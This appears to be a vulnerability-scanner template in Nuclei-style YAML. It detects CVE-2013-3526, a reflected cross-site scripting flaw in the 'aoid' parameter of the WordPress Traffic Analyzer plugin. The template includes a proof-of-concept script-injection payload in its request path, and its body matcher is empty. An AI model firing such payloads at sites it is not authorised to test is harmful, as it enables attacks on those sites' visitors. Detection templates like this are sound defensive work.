id: CVE-2013-3526 info: name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - http://web.archive.org/web/20210123051939/https://www.securityfocus.com/bid/58948/ classification: cve-id: CVE-2013-3526 tags: cve,cve2013,wordpress,xss,wp-plugin requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - "" part: body - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by mp on 2022/02/23